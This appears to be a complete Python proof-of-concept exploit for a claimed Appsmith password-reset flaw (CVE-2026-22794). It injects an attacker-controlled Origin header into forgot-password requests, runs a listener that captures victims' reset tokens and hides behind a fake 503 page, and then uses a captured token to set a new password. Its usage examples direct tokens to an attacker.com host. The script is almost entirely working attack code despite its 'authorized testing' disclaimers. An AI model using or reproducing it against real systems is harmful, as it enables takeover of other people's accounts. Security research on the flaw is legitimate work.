README.md
Rendering markdown...
#!/usr/bin/env python3
"""
CVE-2026-22794 - Appsmith Origin Header Injection PoC
======================================================
Vulnerability: Password Reset Link Hijacking via Origin Header Manipulation
Affected Software: Appsmith (versions prior to patch)
Severity: Critical (CVSS 9.1)
Impact: Full Account Takeover
Description:
Appsmith uses the HTTP Origin header without validation to construct
password reset and email verification URLs. An attacker can inject a
malicious Origin header to redirect password reset tokens to an
attacker-controlled server, resulting in full account takeover.
Author: Security Researcher
Disclaimer: This tool is for authorized security testing only.
Unauthorized access to computer systems is illegal.
"""
import argparse
import requests
import threading
import socket
import sys
import time
import urllib.parse
from http.server import HTTPServer, BaseHTTPRequestHandler
from datetime import datetime
from colorama import Fore, Style, init
# Fix Windows console encoding: force UTF-8 with replacement so printing
# arbitrary text cannot raise UnicodeEncodeError on legacy code pages.
#
# This is done *before* colorama's init() and by reconfiguring the existing
# streams in place. Replacing sys.stdout/sys.stderr with brand-new
# TextIOWrapper objects after init() would discard the wrappers colorama
# installs (losing autoreset/ANSI handling) and would also lose the
# terminal's line buffering, so status messages would show up late.
import io
for _stream in (sys.stdout, sys.stderr):
    # reconfigure() (Python 3.7+) exists only on real text streams; skip
    # anything else (e.g. None under pythonw, or a stream replaced by a host).
    if isinstance(_stream, io.TextIOWrapper):
        _stream.reconfigure(encoding='utf-8', errors='replace')
# Initialize colorama for cross-platform colored output
init(autoreset=True)
# Banner (ASCII-safe for Windows compatibility).
# This is an f-string, so the colorama color codes are interpolated once, when
# the module is loaded; main() prints it at startup.
BANNER = f"""
{Fore.RED}+===================================================================+
| CVE-2026-22794 EXPLOIT |
| Appsmith Origin Header Injection PoC |
| Password Reset Token Hijack |
+===================================================================+{Style.RESET_ALL}
{Fore.YELLOW}[!] DISCLAIMER: For authorized security testing only!{Style.RESET_ALL}
{Fore.YELLOW}[!] Unauthorized access to computer systems is illegal.{Style.RESET_ALL}
"""
# Global storage for captured tokens.
# TokenCaptureHandler.do_GET appends one dict per captured token with the keys
# 'token', 'timestamp', 'path' and 'client_ip'; main() reads the list while the
# capture server is running.
captured_tokens = []
class TokenCaptureHandler(BaseHTTPRequestHandler):
    """HTTP handler to capture password reset tokens.

    GET: the request is printed to the console; when the query string has a
    ``token`` parameter, its first value is appended to the module-level
    ``captured_tokens`` list and to ``captured_tokens.txt``. Every GET is
    answered with a static HTML page.

    POST: the request body is printed to the console and a small JSON
    acknowledgement is returned.

    For authorized security testing only.
    """

    def log_message(self, format, *args):
        """Print a timestamped one-line summary instead of the default stderr log.

        Args:
            format: printf-style format string supplied by the base class.
            *args: Values for ``format``; only the first one is shown.
        """
        timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        # The base class may call this without arguments; fall back to the
        # format string rather than raising IndexError on args[0].
        summary = args[0] if args else format
        print(f"{Fore.GREEN}[{timestamp}] {Fore.CYAN}Request: {summary}{Style.RESET_ALL}")

    def do_GET(self):
        """Handle GET requests - capture reset tokens."""
        parsed_path = urllib.parse.urlparse(self.path)
        query_params = urllib.parse.parse_qs(parsed_path.query)
        print(f"\n{Fore.GREEN}{'='*60}")
        print(f"{Fore.RED}[+] INCOMING REQUEST CAPTURED!{Style.RESET_ALL}")
        print(f"{Fore.GREEN}{'='*60}{Style.RESET_ALL}")
        print(f"{Fore.YELLOW}[*] Path: {Fore.WHITE}{self.path}{Style.RESET_ALL}")
        print(f"{Fore.YELLOW}[*] Client: {Fore.WHITE}{self.client_address[0]}:{self.client_address[1]}{Style.RESET_ALL}")
        # Check for reset token
        if 'token' in query_params:
            # parse_qs returns a list per key; only the first value is used.
            token = query_params['token'][0]
            # The list is only mutated (never rebound), so no `global` is needed.
            captured_tokens.append({
                'token': token,
                'timestamp': datetime.now().isoformat(),
                'path': self.path,
                'client_ip': self.client_address[0]
            })
            print(f"\n{Fore.RED}[!!!] PASSWORD RESET TOKEN CAPTURED!{Style.RESET_ALL}")
            print(f"{Fore.RED}[!!!] Token: {Fore.WHITE}{token}{Style.RESET_ALL}")
            print(f"{Fore.GREEN}{'='*60}{Style.RESET_ALL}\n")
            # Save token to file. The encoding is explicit because a
            # percent-decoded token may contain characters that the platform
            # default encoding cannot represent.
            with open('captured_tokens.txt', 'a', encoding='utf-8') as f:
                f.write(f"{datetime.now().isoformat()} | {token} | {self.client_address[0]}\n")
        # Reply to every GET with the same static HTML page.
        self.send_response(200)
        self.send_header('Content-type', 'text/html')
        self.end_headers()
        # Page body: generic "503 Service Temporarily Unavailable" text
        # (the HTTP status actually sent above is 200).
        response = """
<!DOCTYPE html>
<html>
<head>
<title>Service Temporarily Unavailable</title>
<style>
body { font-family: Arial, sans-serif; text-align: center; padding: 50px; }
h1 { color: #333; }
p { color: #666; }
</style>
</head>
<body>
<h1>503 Service Temporarily Unavailable</h1>
<p>The server is temporarily unable to service your request. Please try again later.</p>
</body>
</html>
"""
        self.wfile.write(response.encode())

    def do_POST(self):
        """Handle POST requests: print the body and acknowledge with JSON."""
        # A missing, malformed or negative Content-Length is treated as
        # "no body" instead of crashing the handler or blocking on read().
        try:
            content_length = max(int(self.headers.get('Content-Length', 0)), 0)
        except (TypeError, ValueError):
            content_length = 0
        # The body is read from rfile (the request stream); requestline is
        # just the request's first line as a str and has no read() method.
        post_data = self.rfile.read(content_length) if content_length else b''
        # errors='replace' so a non-UTF-8 body is still displayed.
        print(f"\n{Fore.YELLOW}[*] POST Data Received: {post_data.decode(errors='replace')}{Style.RESET_ALL}")
        self.send_response(200)
        self.send_header('Content-type', 'application/json')
        self.end_headers()
        self.wfile.write(b'{"status": "ok"}')
def start_capture_server(port: int, host: str = "0.0.0.0"):
    """Create the capture HTTP server and block in its serve loop.

    Args:
        port: TCP port to listen on.
        host: Interface address to bind (default: all interfaces).

    This call does not return under normal operation because it ends in
    ``serve_forever()``; main() runs it on a daemon thread.
    """
    bind_address = (host, port)
    httpd = HTTPServer(bind_address, TokenCaptureHandler)
    started_msg = f"{Fore.GREEN}[+] Token capture server started on {host}:{port}{Style.RESET_ALL}"
    waiting_msg = f"{Fore.YELLOW}[*] Waiting for victim to click the malicious reset link...{Style.RESET_ALL}\n"
    print(started_msg)
    print(waiting_msg)
    httpd.serve_forever()
def send_malicious_reset_request(
    target_url: str,
    victim_email: str,
    attacker_origin: str,
    timeout: int = 30
) -> dict:
    """
    POST a forgot-password request whose Origin header is caller-supplied.

    For authorized security testing only.

    Args:
        target_url: Base URL of the Appsmith instance under test
            (e.g., https://appsmith.target.com)
        victim_email: Email address placed in the request body
        attacker_origin: Value sent in the Origin header
        timeout: Request timeout in seconds
    Returns:
        dict: On a completed request: 'success' (True for HTTP 200/201/202),
        'status_code', 'response' (body text) and 'headers'. On an exception:
        'success' False and 'error' ('timeout' or the exception text).
    """
    # Construct the API endpoint
    endpoint = target_url.rstrip('/') + "/api/v1/users/forgotPassword"
    # Request headers; Origin carries the caller-supplied value
    request_headers = {
        'Content-Type': 'application/json',
        'Origin': attacker_origin,
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Accept': 'application/json, text/plain, */*',
        'Accept-Language': 'en-US,en;q=0.9',
        'Referer': f"{target_url}/user/forgotPassword",
    }
    # Request payload
    body = {'email': victim_email}
    print(f"\n{Fore.CYAN}[*] Sending malicious password reset request...{Style.RESET_ALL}")
    print(f"{Fore.YELLOW}[*] Target: {Fore.WHITE}{endpoint}{Style.RESET_ALL}")
    print(f"{Fore.YELLOW}[*] Victim Email: {Fore.WHITE}{victim_email}{Style.RESET_ALL}")
    print(f"{Fore.RED}[*] Malicious Origin: {Fore.WHITE}{attacker_origin}{Style.RESET_ALL}")
    try:
        resp = requests.post(
            endpoint,
            json=body,
            headers=request_headers,
            timeout=timeout,
            verify=True  # Set to False for self-signed certs in testing
        )
        outcome = {
            'success': resp.status_code in (200, 201, 202),
            'status_code': resp.status_code,
            'response': resp.text,
            'headers': dict(resp.headers)
        }
        # Failure path first; both paths return the same result dict.
        if not outcome['success']:
            print(f"\n{Fore.RED}[-] Request failed with status code: {resp.status_code}{Style.RESET_ALL}")
            print(f"{Fore.YELLOW}[*] Response: {resp.text[:500]}{Style.RESET_ALL}")
            return outcome
        print(f"\n{Fore.GREEN}[+] SUCCESS! Password reset email triggered!{Style.RESET_ALL}")
        print(f"{Fore.GREEN}[+] Status Code: {resp.status_code}{Style.RESET_ALL}")
        print(f"{Fore.YELLOW}[*] The victim will receive an email with a link pointing to:{Style.RESET_ALL}")
        print(f"{Fore.RED} {attacker_origin}/user/resetPassword?token=XXXXX{Style.RESET_ALL}")
        print(f"\n{Fore.CYAN}[*] Waiting for victim to click the link...{Style.RESET_ALL}")
        return outcome
    except requests.exceptions.Timeout:
        print(f"{Fore.RED}[-] Request timed out{Style.RESET_ALL}")
        return {'success': False, 'error': 'timeout'}
    except requests.exceptions.ConnectionError as exc:
        print(f"{Fore.RED}[-] Connection error: {exc}{Style.RESET_ALL}")
        return {'success': False, 'error': str(exc)}
    except Exception as exc:
        print(f"{Fore.RED}[-] Unexpected error: {exc}{Style.RESET_ALL}")
        return {'success': False, 'error': str(exc)}
def reset_password_with_token(
    target_url: str,
    token: str,
    new_password: str,
    timeout: int = 30
) -> dict:
    """
    POST a reset-password request carrying a token and a new password.

    For authorized security testing only.

    Args:
        target_url: Base URL of the Appsmith instance under test
        token: Password reset token to submit
        new_password: Password value to submit
        timeout: Request timeout in seconds
    Returns:
        dict: 'success' True plus 'status_code' for HTTP 200/201; otherwise
        'success' False with 'status_code' and 'response', or with 'error'
        when the request raised.
    """
    endpoint = target_url.rstrip('/') + "/api/v1/users/resetPassword"
    request_headers = {
        'Content-Type': 'application/json',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Accept': 'application/json, text/plain, */*',
    }
    body = {'token': token, 'password': new_password}
    print(f"\n{Fore.RED}[!] EXECUTING ACCOUNT TAKEOVER...{Style.RESET_ALL}")
    # Only the first 20 characters of the token are echoed.
    print(f"{Fore.YELLOW}[*] Using captured token: {token[:20]}...{Style.RESET_ALL}")
    try:
        resp = requests.post(
            endpoint,
            json=body,
            headers=request_headers,
            timeout=timeout,
            verify=True
        )
        # Anything other than 200/201 is reported as a failure.
        if resp.status_code not in (200, 201):
            print(f"{Fore.RED}[-] Password reset failed: {resp.status_code}{Style.RESET_ALL}")
            return {'success': False, 'status_code': resp.status_code, 'response': resp.text}
        print(f"\n{Fore.GREEN}{'='*60}")
        print(f"{Fore.GREEN}[+] ACCOUNT TAKEOVER SUCCESSFUL!{Style.RESET_ALL}")
        print(f"{Fore.GREEN}[+] Password has been reset to: {new_password}{Style.RESET_ALL}")
        print(f"{Fore.GREEN}{'='*60}{Style.RESET_ALL}\n")
        return {'success': True, 'status_code': resp.status_code}
    except Exception as exc:
        print(f"{Fore.RED}[-] Error: {exc}{Style.RESET_ALL}")
        return {'success': False, 'error': str(exc)}
def check_vulnerability(target_url: str) -> bool:
    """
    Heuristically probe the forgot-password endpoint with a foreign Origin.

    Two probes are made: an OPTIONS request whose CORS response header is
    inspected, then a POST whose status code is inspected. A True result is
    only an indication; the function itself recommends manual verification.

    Args:
        target_url: Base URL of the Appsmith instance under test
    Returns:
        bool: True if potentially vulnerable; False if the POST was answered
        with 403 or if any exception occurred.
    """
    print(f"\n{Fore.CYAN}[*] Checking if target is vulnerable...{Style.RESET_ALL}")
    try:
        # Endpoint used by both probes
        check_url = f"{target_url.rstrip('/')}/api/v1/users/forgotPassword"
        # Probe 1: OPTIONS request to look at the CORS response
        preflight = requests.options(
            check_url,
            headers={'Origin': 'https://evil-attacker.com'},
            timeout=10
        )
        if preflight.status_code in (200, 204):
            allow_origin = preflight.headers.get('Access-Control-Allow-Origin', '')
            reflects_origin = 'evil-attacker.com' in allow_origin
            if allow_origin == '*' or reflects_origin:
                print(f"{Fore.RED}[+] Target appears VULNERABLE! CORS is misconfigured.{Style.RESET_ALL}")
                return True
        # Probe 2: POST with the same foreign Origin
        probe = requests.post(
            check_url,
            json={'email': '[email protected]'},
            headers={'Origin': 'https://evil-attacker.com', 'Content-Type': 'application/json'},
            timeout=10
        )
        # A 403 is taken to mean the Origin was rejected; anything else is "maybe".
        if probe.status_code == 403:
            print(f"{Fore.GREEN}[-] Target appears to validate Origin header.{Style.RESET_ALL}")
            return False
        print(f"{Fore.YELLOW}[?] Target may be vulnerable. Manual verification recommended.{Style.RESET_ALL}")
        return True
    except Exception as exc:
        print(f"{Fore.YELLOW}[?] Could not determine vulnerability status: {exc}{Style.RESET_ALL}")
        return False
def get_public_ip() -> str:
    """Return this machine's public IP address as reported by api.ipify.org.

    Returns:
        str: The address text from the service, or the placeholder
        "YOUR_PUBLIC_IP" when the lookup fails (network error, timeout,
        HTTP error status, or an empty body).
    """
    placeholder = "YOUR_PUBLIC_IP"
    try:
        response = requests.get('https://api.ipify.org', timeout=5)
        # Treat 4xx/5xx as failure so an error page is never shown as an IP.
        response.raise_for_status()
    except requests.exceptions.RequestException:
        # Only request failures are swallowed; a bare `except:` would also
        # trap KeyboardInterrupt and SystemExit.
        return placeholder
    return response.text.strip() or placeholder
def _build_parser() -> argparse.ArgumentParser:
    """Build the command-line parser (option definitions only, no validation)."""
    parser = argparse.ArgumentParser(
        description='CVE-2026-22794 - Appsmith Origin Header Injection Exploit',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
# Start token capture server only
python exploit.py --listen --port 8080
# Send malicious reset request
python exploit.py --target https://appsmith.target.com --email [email protected] --attacker-url https://attacker.com
# Full automated attack
python exploit.py --target https://appsmith.target.com --email [email protected] --attacker-url https://attacker.com --listen --port 8080
# Use captured token to reset password
python exploit.py --target https://appsmith.target.com --reset-token CAPTURED_TOKEN --new-password NewP@ssw0rd!
# Check if target is vulnerable
python exploit.py --target https://appsmith.target.com --check
"""
    )
    parser.add_argument(
        '-t', '--target',
        help='Target Appsmith URL (e.g., https://appsmith.target.com)'
    )
    parser.add_argument(
        '-e', '--email',
        help='Victim email address'
    )
    parser.add_argument(
        '-a', '--attacker-url',
        help='Attacker server URL to receive the token (e.g., https://attacker.com)'
    )
    parser.add_argument(
        '-l', '--listen',
        action='store_true',
        help='Start HTTP server to capture tokens'
    )
    parser.add_argument(
        '-p', '--port',
        type=int,
        default=8080,
        help='Port for token capture server (default: 8080)'
    )
    parser.add_argument(
        '--host',
        default='0.0.0.0',
        help='Host to bind capture server (default: 0.0.0.0)'
    )
    parser.add_argument(
        '-r', '--reset-token',
        help='Use a captured token to reset password'
    )
    parser.add_argument(
        '-n', '--new-password',
        help='New password to set (used with --reset-token)'
    )
    parser.add_argument(
        '-c', '--check',
        action='store_true',
        help='Check if target is vulnerable'
    )
    parser.add_argument(
        '--timeout',
        type=int,
        default=30,
        help='Request timeout in seconds (default: 30)'
    )
    return parser


def main():
    """Parse the command line and run the selected mode.

    Modes, checked in this order:
      1. ``--check``: probe the target and exit.
      2. ``--reset-token``: submit a token with ``--new-password`` and exit.
      3. ``--listen``: start the capture server on a daemon thread.
      4. ``--target`` + ``--email`` + ``--attacker-url``: send the reset
         request; if also listening and the request succeeded, keep running
         and report captured tokens until Ctrl+C.
    With no arguments, or with an incomplete combination, help is printed.

    For authorized security testing only.
    """
    print(BANNER)
    parser = _build_parser()
    args = parser.parse_args()
    # If no arguments, show help
    if len(sys.argv) == 1:
        parser.print_help()
        sys.exit(0)
    # Check vulnerability
    if args.check:
        if not args.target:
            print(f"{Fore.RED}[-] Please specify target URL with --target{Style.RESET_ALL}")
            sys.exit(1)
        check_vulnerability(args.target)
        sys.exit(0)
    # Reset password with token
    if args.reset_token:
        if not args.target or not args.new_password:
            print(f"{Fore.RED}[-] Please specify --target and --new-password{Style.RESET_ALL}")
            sys.exit(1)
        reset_password_with_token(args.target, args.reset_token, args.new_password, args.timeout)
        sys.exit(0)
    # Start the capture server in background if requested
    server_thread = None
    if args.listen:
        public_ip = get_public_ip()
        print(f"{Fore.CYAN}[*] Your public IP: {public_ip}{Style.RESET_ALL}")
        print(f"{Fore.YELLOW}[*] Make sure port {args.port} is accessible from the internet{Style.RESET_ALL}")
        server_thread = threading.Thread(
            target=start_capture_server,
            args=(args.port, args.host),
            daemon=True
        )
        server_thread.start()
        time.sleep(1)  # Give server time to start
    # Send malicious reset request
    if args.target and args.email and args.attacker_url:
        result = send_malicious_reset_request(
            args.target,
            args.email,
            args.attacker_url,
            args.timeout
        )
        # If listening, keep the server running
        if args.listen and result.get('success'):
            print(f"\n{Fore.CYAN}[*] Server is running. Press Ctrl+C to stop.{Style.RESET_ALL}")
            reported = 0  # number of tokens already listed on the console
            try:
                # Stop waiting if the server thread has died (for example the
                # port could not be bound) instead of idling forever.
                while server_thread.is_alive():
                    time.sleep(1)
                    # Snapshot: the handler thread may append concurrently.
                    snapshot = list(captured_tokens)
                    # Report only when something new arrived, rather than
                    # re-printing the whole list every second.
                    if len(snapshot) > reported:
                        reported = len(snapshot)
                        print(f"\n{Fore.GREEN}[+] Tokens captured so far: {len(snapshot)}{Style.RESET_ALL}")
                        for t in snapshot:
                            print(f" - {t['token'][:30]}... ({t['timestamp']})")
                print(f"{Fore.RED}[-] Capture server is no longer running{Style.RESET_ALL}")
            except KeyboardInterrupt:
                print(f"\n{Fore.YELLOW}[*] Shutting down...{Style.RESET_ALL}")
            if captured_tokens:
                print(f"\n{Fore.GREEN}[+] Total tokens captured: {len(captured_tokens)}{Style.RESET_ALL}")
                print(f"{Fore.YELLOW}[*] Tokens saved to captured_tokens.txt{Style.RESET_ALL}")
    elif args.listen:
        # Just run the server
        try:
            while server_thread.is_alive():
                time.sleep(1)
            print(f"{Fore.RED}[-] Capture server is no longer running{Style.RESET_ALL}")
        except KeyboardInterrupt:
            print(f"\n{Fore.YELLOW}[*] Shutting down...{Style.RESET_ALL}")
    else:
        parser.print_help()
# Run the CLI only when executed as a script, not when imported as a module.
if __name__ == '__main__':
    main()